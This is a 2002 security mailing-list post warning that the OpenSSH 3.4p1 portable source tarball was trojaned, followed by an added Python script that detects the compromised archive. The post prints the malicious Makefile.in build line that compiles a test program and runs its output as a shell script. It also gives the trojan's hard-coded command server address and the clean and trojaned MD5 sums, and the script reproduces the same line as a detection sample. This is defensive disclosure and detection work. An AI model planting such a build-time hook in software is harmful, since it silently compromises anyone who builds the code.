Firewall Wizards mailing list archives
Re: OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 08:33:09 -0400 (EDT)
On Thu, 1 Aug 2002, Paul D. Robertson wrote:
It would appear that the OpenSSH code for all the non-OpenBSD systems was trojaned at some point pretty recently.

I just checked the MD5 (and sources) of the version I put on my public-facing systems, and it's the same as the FreeBSD ports one (clean):

# md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz

I got that copy around 19:43 Eastern on July 17th. If you pulled a copy after that, it's probably worth a check.

------------------------------------------------------------------------

Things to check:

MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57

Source addition:

openssh-3.4p1/openbsd-compat/Makefile.in:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
It looks to me as if it might try to clean this up after the source is built, but I don't have a test environment I'm willing to sacrifice at the moment. If you don't have the tar.gz file to check the MD5 sum of and you built from source, I'd recommend getting a new copy once the trojan has been replaced, or grabbing a copy from somewhere like the FreeBSD ports collection.
Trojan connection: 203.62.158.32:6667 (web.snsonline.net)
This address and port look to be hard coded in the trojan. It's probably worth an outbound access list if you're worried- although the server seems to be down at the moment.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson            "My statements in this message are personal opinions
proberts () patriot net      which may have no basis whatsoever in fact."
probertson () trusecure com  Director of Risk Assessment TruSecure Corporation
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
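
An added example, not part of the original message or of the OpenSSH project: one way to automate the two checks listed above, using the MD5 values and the Makefile.in path quoted in the message. The function names and the in-memory sample tarball are constructed for illustration.

```python
import hashlib
import io
import tarfile

# MD5 values and file path as quoted in the message above.
CLEAN_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJAN_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"
MAKEFILE = "openssh-3.4p1/openbsd-compat/Makefile.in"


def check_tarball(data: bytes) -> dict:
    """Classify a tar.gz by MD5 and list Makefile.in lines that mention bf-test."""
    digest = hashlib.md5(data).hexdigest()
    if digest == CLEAN_MD5:
        verdict = "matches clean MD5"
    elif digest == TROJAN_MD5:
        verdict = "matches trojaned MD5"
    else:
        verdict = "unknown MD5"
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        try:
            member = tar.extractfile(MAKEFILE)  # read only, nothing is unpacked
        except KeyError:  # archive has no such file
            member = None
        if member is not None:
            text = member.read().decode("latin-1")
            for number, line in enumerate(text.splitlines(), 1):
                if "bf-test" in line:
                    hits.append((number, line.strip()))
    return {"md5": digest, "verdict": verdict, "suspicious_lines": hits}


def make_sample(makefile_text: str, name: str = MAKEFILE) -> bytes:
    """Build a constructed one-file tar.gz in memory (not a real release)."""
    body = makefile_text.encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name)
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample carrying the recipe line reported in the message.
    sample = make_sample("all: libopenbsd-compat.a\n\t@ $(CC) bf-test.c -o bf-test; "
                         "./bf-test>bf-test.out; sh ./bf-test.out &\n")
    print(check_tarball(sample))
```

To check a downloaded file, pass its bytes: `check_tarball(open("openssh-3.4p1.tar.gz", "rb").read())`.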